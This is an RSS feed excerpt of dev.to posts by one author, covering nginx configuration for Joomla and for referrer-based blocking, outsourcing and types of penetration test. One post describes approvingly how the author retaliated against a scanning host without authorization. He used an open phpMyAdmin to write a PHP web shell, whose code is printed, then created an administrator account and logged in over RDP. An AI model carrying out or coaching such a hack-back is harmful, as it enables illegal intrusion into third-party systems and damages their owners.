        try_files $uri $uri/ @joomlaurls; ## adding our processing rules
    }

    location @joomlaurls {
        rewrite ^/(.+)/$ /$1 permanent; ## removing slashes
        try_files $uri $uri/ /index.php?$args; ## setting up SEF urls
        #error_page 404 = /index.php;
    }

    location ~ [^/]\.ph(p\d*|tml)$ {
        try_files /does_not_exists @php; ## processing 404
    }

    access_log off;

    location @php {
        fastcgi_index index.php;
        fastcgi_param PHP_ADMIN_VALUE "sendmail_path = /usr/sbin/sendmail -t -i -f admin@mysite.com";
        fastcgi_pass unix:/var/www/php-fpm/www-root.sock;
        fastcgi_split_path_info ^((?U).+\.ph(?:p\d*|tml))(/?.+)$;
        try_files $uri =404;
        include fastcgi_params;
    }
}
&lt;/pre&gt;

&lt;p&gt;That's it! Seems simple? But during research and implementation some issues still appeared, which were fixed in the configuration example above. I hadn't worked with Joomla before, mainly with WordPress, so this case was actually interesting for me and possibly it may help somebody else.&lt;/p&gt;
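&lt;p&gt;To see how the rules above compose for a single request, here is a small Python model of the routing. It is an added example written for this page, not code from the post, from Joomla or from nginx: it applies the index.php rewrite, the .php location with its =404 fallback, try_files against a constructed document root, and the trailing-slash rewrite, then follows the 301s the way a browser would. The file and directory names are made up for the walkthrough, and the directory handling is a simplification of what the static and index modules do. One thing the model makes visible is that the slash-stripping rewrite removes one slash per redirect, so a request with three trailing slashes is cleaned up by a chain of three 301s rather than by one.&lt;/p&gt;

```python
import re

# Constructed document root for the simulation; these paths are not from the post.
FILES = {"/index.php", "/administrator/index.php", "/images/logo.png", "/robots.txt"}
DIRS = {"/", "/administrator", "/images"}

# The regexes from the config, unchanged apart from Python raw-string quoting.
HIDE_INDEX = re.compile(r"^/index\.php/(.*)")        # rewrite ^/index.php/(.*) /$1 permanent;
STRIP_SLASH = re.compile(r"^/(.+)/$")                 # rewrite ^/(.+)/$ /$1 permanent;
PHP_LOCATION = re.compile(r"[^/]\.ph(p\d*|tml)$")     # location ~ [^/]\.ph(p\d*|tml)$


def route_once(uri, args=""):
    """One pass through the server block for a request URI.

    Returns (status, target): target is '/path' for a 301 redirect,
    'php:/file' when the request reaches php-fpm, 'static:/file' for a
    file served by nginx itself, or None for an error response.
    """
    # server-level rewrite: hide /index.php/ at the front of SEF URLs
    m = HIDE_INDEX.match(uri)
    if m:
        return 301, "/" + m.group(1)

    # location ~ [^/]\.ph(p\d*|tml)$ : try_files /does_not_exists @php;
    # @php then runs try_files $uri =404, so a missing script is a real 404
    # and never falls back to index.php
    if PHP_LOCATION.search(uri):
        if uri in FILES:
            return 200, "php:" + uri
        return 404, None

    # location / : try_files $uri $uri/ @joomlaurls;
    if uri in FILES:
        return 200, "static:" + uri
    base = uri.rstrip("/") or "/"
    if base in DIRS:
        if not uri.endswith("/"):
            return 301, uri + "/"               # nginx adds the slash for a directory
        index = base.rstrip("/") + "/index.php"  # `index index.php;`
        if index in FILES:
            return 200, "php:" + index
        return 403, None                        # directory without an index file

    # location @joomlaurls
    m = STRIP_SLASH.match(uri)
    if m:
        return 301, "/" + m.group(1)            # strips ONE trailing slash per redirect
    # try_files $uri $uri/ /index.php?$args;  (nginx appends $args even when empty)
    return 200, "php:/index.php" + ("?" + args if args else "")


def follow(uri, args="", max_hops=10):
    """Follow 301s the way a browser would; returns the list of hops."""
    hops = []
    for _ in range(max_hops):
        status, target = route_once(uri, args)
        hops.append((status, target))
        if status == 301:
            uri = target
            continue
        return hops
    raise RuntimeError("redirect loop")
```

&lt;p&gt;Calling &lt;code&gt;follow("/about///")&lt;/code&gt; returns three 301 hops before the request finally reaches index.php, while &lt;code&gt;route_once("/missing.php")&lt;/code&gt; is a 404 straight away, which is the behaviour the text describes.&lt;/p&gt;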

</description>
      <category>joomla</category>
      <category>nginx</category>
      <category>phpfpm</category>
      <category>sef</category>
    </item>
    <item>
      <title>Outsourcing: Pros and cons</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Tue, 19 Mar 2019 15:09:19 +0000</pubDate>
      <link>https://dev.to/sm0k3/outsourcing-pros-and-cons-4m9l</link>
      <guid>https://dev.to/sm0k3/outsourcing-pros-and-cons-4m9l</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--xa1yclJL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/qa3hsixtg2tev8m1oory.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--xa1yclJL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/qa3hsixtg2tev8m1oory.jpg" alt="Outsourcing" title="Outsourcing pros and cons"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I would like to note some points from the perspective of a person who has been working in outsourcing for almost 5 years. Before outsourcing I worked as a 1st line support specialist, later moved to another position - ERP consultant / programmer, then moved again to another company and a new position - Information Security Specialist / Analyst (SIEM, SOX audit etc.).&lt;/p&gt;

&lt;p&gt;After 8 months in infosec as an analyst and SIEM engineer I decided to change something again, because that kind of work is routine and boring for me, so I changed company again and took the position of Linux system administrator on a commercial project, something like 2nd line support (remote).&lt;/p&gt;

&lt;p&gt;Before I came to my current company, I changed 2 other companies and 3 positions; mainly the companies were in the "product" model - retail, telecommunications - where I always worked on one project, and actually nothing major changed for me.&lt;/p&gt;

&lt;p&gt;The advantages of this approach are that you concentrate on one thing: your specialization becomes narrower, but at the same time the knowledge is deeper, you understand more different aspects of the same product, you understand it better and you naturally see the results of your work. Although development takes place exclusively within the framework of a single product or project, the knowledge at the end is more in-depth and, if I may say so, higher-quality than when you go everywhere a little bit and with a certain periodicity.&lt;/p&gt;

&lt;p&gt;Already in outsourcing, I was able to try myself as a Linux system administrator and later, first as a specialist and then as a team leader and project manager, on penetration testing projects.&lt;/p&gt;

&lt;p&gt;On the positive side of outsourcing I would highlight such things as the ability to quickly switch between projects: you work not with just one project, but projects are constantly changing - some easier, some more difficult - and in general this gives new experience and new knowledge. If in the process of working on a project something is especially interesting, there is always the opportunity to study it in depth.&lt;/p&gt;

&lt;p&gt;For me personally, it would probably be extremely boring to work for a long time on only one kind of project (4-5-6 years), and apparently for this reason I chose the direction of outsourcing for myself. Although I do not see the results of my work in the literal sense of the word - for example, the development of some application or product of my own on an ongoing basis - I see these results a little differently: the direction is popularized, the team is expanding, we open new competencies and we grow.&lt;/p&gt;

&lt;p&gt;Of course, if we talk about startups, then working on the product in this case gives the feeling of opening something new, a slightly different sensation and perception of everyday life, rather than when you go on schedule, fix someone else's mistakes, understand that it can last forever and the picture as a whole will not change with the same product, and the sensation of Groundhog Day takes shape.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Pros&lt;/b&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Changing projects&lt;/li&gt;
&lt;li&gt;Working with a wide variety of technologies&lt;/li&gt;
&lt;li&gt;Meet more new interesting people&lt;/li&gt;
&lt;li&gt;Traveling&lt;/li&gt;
&lt;li&gt;More responsibility&lt;/li&gt;
&lt;li&gt;As for self-organization - it may not always be applicable, because you do not always have the possibility to offer something or give advice to the customer; the customer says what to do and how to do it (slavery? :))&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;b&gt;Cons&lt;/b&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You may not see progress (if we speak about the final result in development, testing etc.)&lt;/li&gt;
&lt;li&gt;These results are not yours :)&lt;/li&gt;
&lt;li&gt;More of daily routine...&lt;/li&gt;
&lt;li&gt;You need to meet not only your company's requirements, but also the customer's&lt;/li&gt;
&lt;li&gt;Additional interviews with customers?&lt;/li&gt;
&lt;li&gt;If there is no project within your main skills, you can be assigned to another project/division you are possibly not interested in&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>outsourcing</category>
      <category>pronsandcons</category>
      <category>development</category>
      <category>testing</category>
    </item>
    <item>
      <title>About penetration testing</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Wed, 20 Feb 2019 14:14:10 +0000</pubDate>
      <link>https://dev.to/sm0k3/about-penetration-testing-143l</link>
      <guid>https://dev.to/sm0k3/about-penetration-testing-143l</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--fc_UqNm7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/9f55hb0ryq08lfalrzr8.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fc_UqNm7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/9f55hb0ryq08lfalrzr8.jpeg" alt="Cybersecurity" title="Penetration Testing &amp;amp; Cybersecurity"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In my work, I often communicate with customers as a leading specialist and representative of the cyber security division, in order to thoroughly discuss all requests and issues.&lt;/p&gt;

&lt;p&gt;In the process of such calls and meetings it periodically emerges that some customers are not completely aware of what a service such as a penetration test means. Many for some reason confuse this type of service with a vulnerability assessment or even a simple scan, and there is also some confusion about the approaches to the implementation of penetration testing projects.&lt;/p&gt;

&lt;p&gt;Some cannot decide what they need - &lt;a href="https://www.scanforsecurity.com/articles/what-is-penetration-testing.html"&gt;penetration testing&lt;/a&gt; or &lt;a href="https://www.scanforsecurity.com/articles/vulnerability-assessment.html"&gt;vulnerability assessment&lt;/a&gt; - and some do not quite correctly determine the desired approach, taking into account the specifics of the project.&lt;/p&gt;

&lt;p&gt;A real case: a web application with a limited registration process, which the customer wanted checked in the black box model, although from the customer's expectations I immediately realized that it was a gray box, with the possibility of performing a check from a user's personal account as well. Of course, after summing up this information, we came to a common denominator.&lt;/p&gt;

&lt;p&gt;Yes, I understand that many clients do not have their own information security departments and it is simply impossible for them to correctly formulate requirements for this type of project. Of course, our main task is to help and guide them on the right path, which I do with great success.&lt;/p&gt;

&lt;p&gt;But what is the essence of the problem? Perhaps this topic is not covered sufficiently? Or is there too much complicated terminology and not completely understandable approaches / processes?&lt;/p&gt;

&lt;p&gt;Let's try to clear up these issues a little.&lt;/p&gt;

&lt;h3&gt;The main types of security testing&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Penetration tests&lt;/li&gt;
&lt;li&gt;Vulnerability Assessment&lt;/li&gt;
&lt;li&gt;Security audit&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Types of penetration tests&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;b&gt;Black box&lt;/b&gt; - we work with nearly zero information: we have either a link to the site or just the name of the company. The goal, of course, is to compromise the application / network / any data (including employees).&lt;/li&gt;
&lt;li&gt;
&lt;b&gt;Gray box&lt;/b&gt; - in this case we work with some near-minimal data set, approximately at the black box level, but we may already have data for entering the application, for example.&lt;/li&gt;
&lt;li&gt;
&lt;b&gt;White box&lt;/b&gt; - this is most often applicable when working directly from the customer's infrastructure and inside it, when we have the network topology, know the IP addresses of the servers and what types of applications are used. This approach is also partially applicable to projects related to source code analysis.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;Other types of security testing&lt;/h3&gt;

&lt;p&gt;&lt;b&gt;Vulnerability assessment&lt;/b&gt; is a more automated procedure, in which there is an additional step of validating the results obtained and eliminating false positives. The main task is to find as many vulnerabilities as possible.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Security audit&lt;/b&gt; - we have all the cards in our hands: access with administrator-level privileges or, alternatively, copies of the configuration files. The main task is to study the solution used, the architecture, the software used and its versions, and the methods for restricting access to and communication between systems.&lt;/p&gt;

&lt;p&gt;In this post I was not able to cover all approaches and methods, but on the whole the picture looks something like this. I hope this material will at least help those who wish to conduct a pentest or an audit of their systems to make the right choice of the type of service and the approaches used.&lt;/p&gt;

</description>
      <category>penetrationtesting</category>
      <category>pentest</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Restriction of user access to the website running on nginx</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Thu, 06 Dec 2018 05:25:09 +0000</pubDate>
      <link>https://dev.to/sm0k3/restriction-of-user-access-to-the-website-running-on-nginx-31o4</link>
      <guid>https://dev.to/sm0k3/restriction-of-user-access-to-the-website-running-on-nginx-31o4</guid>
      <description>&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fnenhxsrf57qvuj5w0w0p.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fnenhxsrf57qvuj5w0w0p.jpeg" title="Limiting access to your website with Nginx" alt="alt text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One interesting problem about Nginx I've met on freelance: access to the site had to be restricted so that users can only come from search engines. Visits from instant messengers, from other sites and direct visits had to be forbidden, while search robots had to be allowed to index the site without any obstacles (direct access, transfer from other sites, etc., i.e. to work without restrictions).&lt;/p&gt;

&lt;p&gt;The server was on &lt;b&gt;Ubuntu with Nginx&lt;/b&gt; as the web server and the site ran on WordPress, nothing new. The implementation was supposed to be at the web server level: with nginx tools it was necessary to determine where a visitor came from and whether it was a user or a search bot, and issue the appropriate directive for subsequent actions - give access to the site or send them to the stub page.&lt;/p&gt;

&lt;p&gt;Changes were made at the level of the site configuration file in nginx, e.g. mysite.conf for a single target host.&lt;/p&gt;

&lt;p&gt;To determine more accurately who is who and where they came from, the “$http_referer” and “$http_user_agent” variables, regular expressions, standard lists of bot agents, a custom error page and rewrite were used to add several conditions; the result is a condition of about 12 lines of config (which can still be trimmed a little).&lt;/p&gt;

&lt;p&gt;The logic of the nginx rules was as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If the user came to the site directly or NOT from a search engine - assign him the marker "a"&lt;/li&gt;
&lt;li&gt;If this is not a search bot - assign the marker "b"&lt;/li&gt;
&lt;li&gt;Check for the presence of the markers: if both are present, then it was a user who came directly or from another site, and we send him to the stub.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now let's look at the rules in detail.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;The first condition:&lt;/b&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if ($http_referer ~* "^$|^((?!(google|yandex|bing|yahoo|mail|duckduckgo)\.[a-z]+).)*$") {
  set $marker a;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What is what? Everything is simple: we ask nginx to check each visitor's referrer, i.e. where they came from. The “^$” alternative checks whether the referrer is empty - this is how direct visits to the site are detected. Next, we try to determine from the beginning of the line that the user came NOT from google, yandex or other search engines (in the regular expression, the “(?!...)” construction is a negative lookahead, i.e. “not followed by”), and then the corresponding list of them.&lt;/p&gt;

&lt;p&gt;I decided to list only the domains but not their endings, since the ending may differ for different segments of the Internet, so the more universal construction “[a-z]+” was used, which means lowercase letters, one or more of them (from 1 and up to... a lot). The dot at the end means that absolutely anything can follow. A little earlier there is one more dot - it is escaped with the “\” symbol so that it is interpreted as a literal dot and not as “anything”.&lt;/p&gt;

&lt;p&gt;If this condition is fulfilled, then we set the $marker variable to the value "a" and go on.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;The second condition:&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Everything is much simpler and more modest here: we need to &lt;b&gt;define a bot or user by agent&lt;/b&gt;. In bots they are standard and don't change, and therefore they were chosen as an example for checking (besides, there are fewer of them). The condition states that if the “user-agent” parameter does not match the mask for Google, Yandex, etc., it is not a bot.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if ($http_user_agent !~* "googlebot|yandex|yahoo|bing") {
  set $marker "${marker}b";
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The exclamation mark at the very beginning of the condition indicates that a mismatch is checked, the asterisk makes the match case-insensitive, and then the known agents of the various search engines are listed.&lt;/p&gt;

&lt;p&gt;If this condition is fulfilled, we assign the second value to our $marker variable. The “${marker}b” construction is used so that the data from the first check is not lost, that is, we simply append the data of the second condition.&lt;/p&gt;

&lt;p&gt;And, of course, at the end of all these checks, it only remains to verify our condition by a simple comparison:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if ($marker = ab) {
  return 403;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the value of the variable after all these manipulations equals “ab”, then everything worked correctly: we have identified a user who came to the site directly or not from a search engine, and special measures must be applied - send them to the stub site.&lt;/p&gt;

&lt;p&gt;Here it is already at the discretion of the administrator: you can return any error code, for example 403, or configure a redirect to a custom page.&lt;/p&gt;

&lt;p&gt;In my case, the complete solution was as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if ($http_referer ~* "^$|^((?!(google|yandex|bing|yahoo|mail|duckduckgo|website)\.[a-z]+).)*$") {
  set $bot a;
}

if ($http_user_agent !~* "googlebot|yandex|yahoo|bing") {
  set $bot "${bot}b";
}
if ($bot = ab) {
  rewrite ^/(.*)$ https://website.com/index.html permanent;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The final version also lists “website”, the customer's own domain, in the referrer regex so that users can move freely within the site.&lt;/p&gt;
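&lt;p&gt;The following Python model reproduces the two conditions and the marker logic so the decision can be checked against sample requests without a server. It is an added example written for this page, not code from the post; the request headers in it are constructed, not captured traffic. The regexes are those of the final snippet, with re.IGNORECASE standing in for nginx's case-insensitive “~*” and “!~*”. The model also shows the limit of this approach that a practitioner should keep in mind: both $http_referer and $http_user_agent are sent by the client, so the rule shapes traffic from honest browsers and well-behaved crawlers but is not an access control. A client that simply claims a crawler's User-Agent is let through, which is why Google documents verifying Googlebot by reverse and forward DNS of the source IP rather than by the header.&lt;/p&gt;

```python
import re

# Patterns copied from the post's final nginx snippet. nginx's `~*` and `!~*`
# are case-insensitive PCRE matches, so re.IGNORECASE reproduces them.
NOT_FROM_SEARCH = re.compile(
    r"^$|^((?!(google|yandex|bing|yahoo|mail|duckduckgo|website)\.[a-z]+).)*$",
    re.IGNORECASE,
)
BOT_AGENT = re.compile(r"googlebot|yandex|yahoo|bing", re.IGNORECASE)


def marker(referer, user_agent):
    """Build the $bot variable exactly as the two nginx `if` blocks do."""
    bot = ""
    if NOT_FROM_SEARCH.search(referer):     # if ($http_referer ~* "...") { set $bot a; }
        bot = bot + "a"
    if not BOT_AGENT.search(user_agent):    # if ($http_user_agent !~* "...") { set $bot "${bot}b"; }
        bot = bot + "b"
    return bot


def decide(referer, user_agent):
    """'redirect' when both markers are set (if ($bot = ab)), otherwise 'allow'."""
    return "redirect" if marker(referer, user_agent) == "ab" else "allow"


# Constructed request headers for the walkthrough (not captured traffic).
BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

SAMPLES = [
    ("", BROWSER),                                   # direct visit: blocked
    ("https://www.google.com/search?q=test", BROWSER),  # from a search engine: allowed
    ("https://t.me/somechannel", BROWSER),           # messenger link: blocked
    ("https://website.com/page1", BROWSER),          # navigation inside the customer's site: allowed
    ("", GOOGLEBOT),                                 # crawler fetching directly: allowed
    ("", "curl/8.0 googlebot"),                      # header is client-chosen, so this is allowed too
]


def walkthrough():
    """Decision for every sample, in order."""
    return [(ref, ua, decide(ref, ua)) for ref, ua in SAMPLES]
```

&lt;p&gt;The last sample is the one to remember when deciding what this rule is for: it keeps casual direct traffic out of the site, but any client that sets a crawler-like User-Agent passes the second condition, so the rule must not be used to protect content that actually needs authorization.&lt;/p&gt;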

</description>
      <category>nginx</category>
      <category>web</category>
      <category>ubuntu</category>
      <category>configuration</category>
    </item>
    <item>
      <title>Security Testing: Fighting against bots</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Wed, 05 Dec 2018 09:14:42 +0000</pubDate>
      <link>https://dev.to/sm0k3/security-testing-fighting-against-bots-2k6o</link>
      <guid>https://dev.to/sm0k3/security-testing-fighting-against-bots-2k6o</guid>
<description>&lt;p&gt;A rather funny situation came up at work: once again, after checking the incidents in the SIEM, another scanning event was discovered. Some weird host from Brazil had again scanned us for all sorts of vulnerabilities. I was too lazy to write another abuse report, so I decided to see what kind of host it was and what could be done with it.&lt;/p&gt;

&lt;p&gt;The first thing I did was turn to the 2ip service and try to find out what was hosted there and what domain, but that didn't give anything interesting. I started &lt;a href="https://www.scanforsecurity.com/scanning-techniques/scanning-with-nmap.html" rel="noopener noreferrer"&gt;nmap&lt;/a&gt; and ran through the ports, and also scanned the directories - also nothing special, but direct access to the server threw us into the dashboard of the XAMPP web server, where there were links to various docs, guides, and ... phpMyAdmin&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fwwpvynr4j4fzsyyrehas.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fwwpvynr4j4fzsyyrehas.png" title="Target XAMPP Server Info" alt="alt text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To my surprise, the MySQL database with phpMyAdmin hanging on it was not password protected, so from then on it was just a technical matter. In addition to the database utilities, we found a phpinfo file that reported the location of the dashboard in XAMPP and, accordingly, all the necessary paths.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F9ir6g9inpwjumgg6fxhw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F9ir6g9inpwjumgg6fxhw.png" title="Target Server PHP Info" alt="alt text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step is to check the login to the admin area, but as I wrote above, the root password was not set, and for this reason we had full access. Perhaps during the installation (or after installation, when setting up the database), for some reason, instead of localhost, access to the database was opened to the entire Internet. I assume that the root user was not assigned a password in the expectation that the database would be available only locally.&lt;/p&gt;

&lt;p&gt;Because of this misstep, someone had climbed onto these guys' server and begun performing automated scans of random systems on the Internet for vulnerabilities, including our email and something else.&lt;/p&gt;

&lt;p&gt;Well, let's continue our simple quest and go to the database:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fu67jovc6shas3uzkxe5g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fu67jovc6shas3uzkxe5g.png" title="Target MySQL &amp;amp; phpMyAdmin" alt="alt text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, we have full access, so it only remains to show a flight of fantasy. As you know, web servers on Windows machines work as the system user, but this is already known. We just need to upload the web shell and then stop the scanning of our infrastructure (the good way - cut out all the malware; the bad way - just block our IPs on the internal firewall).&lt;/p&gt;

&lt;p&gt;Upload the web shell through the MySQL database using the INTO OUTFILE command:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fqcmg7gozkexka6agsj6q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fqcmg7gozkexka6agsj6q.png" title="Sending Web Shell To Target Server" alt="alt text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Shell code itself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;HTML&amp;gt; &amp;lt;BODY&amp;gt; &amp;lt;FORM METHOD = 'GET' NAME = 'myform' ACTION = ''&amp;gt;
&amp;lt;INPUT TYPE = 'text' NAME = 'cmd'&amp;gt; &amp;lt;INPUT TYPE = 'submit' VALUE = 'Send'&amp;gt; &amp;lt;/ FORM&amp;gt;
&amp;lt;pre&amp;gt; &amp;lt;? php if ($ _ GET ['cmd']) {system ($ _ GET ['cmd']); }?&amp;gt;
&amp;lt;/ pre&amp;gt; &amp;lt;/ BODY&amp;gt; &amp;lt;/ HTML&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Actually, that is probably all; further actions are quite expected. From the web shell we only needed access to the server in order to add a user, place it in the local administrators group and connect to the server via RDP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fqyz570rvqc3hzoyoke5a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fqyz570rvqc3hzoyoke5a.png" title="Target Windows Server Access" alt="alt text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, this is a not-so-tricky way to deal with one scanner of our infrastructure from the Internet. There were also thoughts of placing a miner there, but the payoff would be minimal and it wasn't worth it. As a bonus, I deleted other web shells from the server; I did not set a database password, because apart from the root user there were no others, and it was likely that some application working with this database could have crashed.&lt;/p&gt;

&lt;p&gt;In performing all these manipulations, only the attackers who had hacked this server earlier suffered - their backdoors were removed.&lt;/p&gt;

</description>
      <category>pentest</category>
      <category>penetrationtesting</category>
      <category>infosec</category>
      <category>vulnerabilities</category>
    </item>
    <item>
      <title>How to create own threat intelligence platform with PHP, cURL and API</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Wed, 05 Sep 2018 15:24:02 +0000</pubDate>
      <link>https://dev.to/sm0k3/how-to-create-own-threat-intelligence-platform-with-php-curl-and-api-53ch</link>
      <guid>https://dev.to/sm0k3/how-to-create-own-threat-intelligence-platform-with-php-curl-and-api-53ch</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--whZhf6Q8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/ry2oaewi8q2tywa6r90e.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--whZhf6Q8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/ry2oaewi8q2tywa6r90e.jpg" alt="alt text" title="Threat Intelligence"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A few years ago, when &lt;b&gt;information security&lt;/b&gt; was not so popular as a commercial direction, there were not so many useful services which could help you detect technical problems, security issues and vulnerabilities in your infrastructure or website.&lt;/p&gt;

&lt;p&gt;Actually, the problem was not only in tool availability and quality, but also in the technologies used and people's qualifications; if we speak about the human factor, there was a lack of information on how to make your code secure, of best-practice patterns, etc., which accumulates over time from previous experience and new technologies.&lt;/p&gt;

&lt;p&gt;As a good developer you had to check the code for vulnerabilities yourself; as a good admin you needed to securely configure your Windows or Linux machines/servers, and again, everything was based on experience of how to find and identify those problems/vulnerabilities, and not many developers could do this properly. Here we don't even speak about &lt;b&gt;penetration testing&lt;/b&gt;, as it was not so popular and poorly promoted while not in trend.&lt;/p&gt;

&lt;p&gt;In old news from the past 5-7 years you can find many interesting hacks and exposures: Sony, international banks and many others, but how did that happen?&lt;br&gt;
Somebody forgot about a test/staging server with default/simple/demo credentials, somebody used simple and popular passwords or didn't update after a critical vulnerability was disclosed, and all this led to serious leaks of confidential information.&lt;/p&gt;

&lt;p&gt;Today there are many ready-to-use solutions, tested by time and the community, on the basis of which - in order not to reinvent the wheel - you can build and adjust a system for your needs. Yes, many systems in this niche cost money, but if you combine them, correlate and analyze information from several such sources, you can get nearly the same output as from a paid subscription to one of those systems (just as an example; of course not 100% the same :))&lt;/p&gt;

&lt;p&gt;Here is a list of platforms which you can easily integrate through an API:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Shodan&lt;/li&gt;
&lt;li&gt;VirusTotal&lt;/li&gt;
